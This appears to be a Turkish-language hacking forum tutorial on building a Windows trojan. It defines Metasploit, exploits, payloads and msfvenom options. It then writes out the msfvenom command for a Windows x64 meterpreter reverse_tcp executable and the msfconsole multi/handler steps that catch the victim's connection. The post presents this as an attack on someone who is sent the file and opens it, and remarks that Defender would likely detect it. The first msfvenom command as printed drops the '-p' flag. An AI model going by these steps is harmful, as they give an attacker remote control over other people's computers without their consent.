- 12 Haz 2023
- 985
- 624
Msfvenom ile Trojan Yapımı
Merhaba arkadaşlar bu gün Trojan nedir nasıl yapılır,metasploit nedir gibi konulardan bahsedeceğim lafı fazla uzatmadan konuya geçelim;
Metasploit Nedir ?
-Metasploit sistemleri exploit etmek için geliştirilmiş bir araçtır.
Peki Nedir Bu Exploit ?
-Exploit sistemde yer alan açıklardan faydalanılarak geliştirilmiş kodlardır ve böylece sistemi devre dışı bırakabilir.
Msfvenom Nedir ?
-Msfvenom verdiğimiz parametrelerle metasploit aracılığıyla payloads oluşturabilen bir sistemdir.
Şimdi linux'u açalım ve root kullanıcısını açalım;
msfvenom
yazıp çalıştıralım
Gördüğünüz gibi burada parametreler var. Peki bunlar ne işe yarıyor;
En başta gördüğünüz -l den örnek vereceğim. Mesela biz msfvenom -l encrypt kodunu yazdığımız zaman bize msfvenom'un encrypt türlerini listeliyor. Yani -l Listeleme yöntemidir.
Şimdi bir altına geçelim -p yani Payload
Payload Ne Demek ?
-Şimdi biz truva atımızı oluşturunca karşı ve bizim aramızdaki bağlantının nasıl gerçekleşeceğine payload diyoruz.
Şimdi payloadlarımızı listeleyelim bunun için;
msfvenom -l payloads
Kodunu giriyoruz
Solda gördüğünüz şeyler bizim payloadslarımız.. Bu payloadsların bir tane söz dizini var. Şimdi bu söz dizinini size açıklayayım;
En başta gördüğünüz windows sistemi belirtiyor. x64 sistemin mimarisini belirtiyor. Bundan sonrakinde shell,meterpreter gibi bunlarda bizim konsolumuzu belirtiyor.
Ne Demek Konsol ?
Biz truva atını oluşturup karşıya gönderince bizim bu bağlantıyı yönetebileceğimiz bir panel gerekiyor. İşte bunlarda shell,meterpreter gibi
En sondaki bölümde bağlantının gerçekleşme türünü belirtiyor.
Normalde konu bu kadardı ancak size uygulamalı halini de göstereyim. Aklınızda hiç bir soru işareti kalsın istemiyorum.
Attack
Son kısıma geldik... Şimdi üst tarafta anlattığım her şey kullanacağız.Öncelikle yapacağımız işlemi anlatayım;
msfvenom diyoruz sonrada -p ile payload'ı belirtiyoruz. Ben windows'a atak gerçekleştireceğim için windows yazıyoruz. Şimdiki kısımda eğer x64 gibi mimarisini belirtmediğiniz zaman hata alabilirsiniz. Bu yüzden belirtmeniz önemli.
Meterpreter rewerse_tcp bu ne demek tcp protokolü üzerinden bana ters bağlantı aç ters bağlantıyı meterpreter'e bağla
LHOST yani Lokal Host demek yani bizim kendi bilgisayarımızın IP adresi peki bizim buna neden ihtiyacımız var ?
Çünkü arkadaşlar hani karşı bilgisayar bize bağlanıcak ya bağlanıcağı yeri bilmesi gerekiyor.
Bunu öğrenmek içinde terminal'e İfconfig yazıyoruz
Şimdi LPORT= 5050 olsun
-f ile formatı belirtmemizi istiyor windows bir sistem olduğu için exe olucak. Ardından >payloadun ismi
Bu size anlattığım açıklama kısmıydı şimdi kodu girelim;
msfvenom windows/x64/meterpreter/reverse_tcp LHOST=IPadresiniz LPORT=5050 -f exe > payloadunismi.exe
Not:En sona deneme1.exe koymayı unutmayın
Bu kadardı peki adam buna tıkladı e bana nerden gelicek
Bunu metasploit ile yapacağız arkadaşlar.
terminale
msfconsole
yazıyoruz. Ardından
use exploit/multi/handler
yazıyoruz ve
options
yazıyoruz.
Kullandığımız options komutu bizim multi/handler'a ne gibi parametreler verebileceğimizi söylüyor.
Şimdi
set payload windows/x64/meterpreter/reverse_tcp
yazıyoruz.
set lhost Ipadresiniz
Ardından
set lport 5050
Şuanda tüm işlemler bitti başlatmak için
run
demeniz yeterli
Not:Eğer defender açıksa yüksek ihtimalle yazılımımız yakalanacaktır.
Ancak defender yoksa ve karşı taraf bunu açarsa ne yapabiliriz
Karşı taraf dosyayı açınca terminalinizde belli olucaktır ardından help yazıp neler yapabileceğinizi görebilirsiniz.
Konumuz bu kadardı umarım faydlı olmuştur. Anlamadığınız yer olursa yardımcı olmaya çalışırım iyi forumlar.
Moderatör tarafında düzenlendi: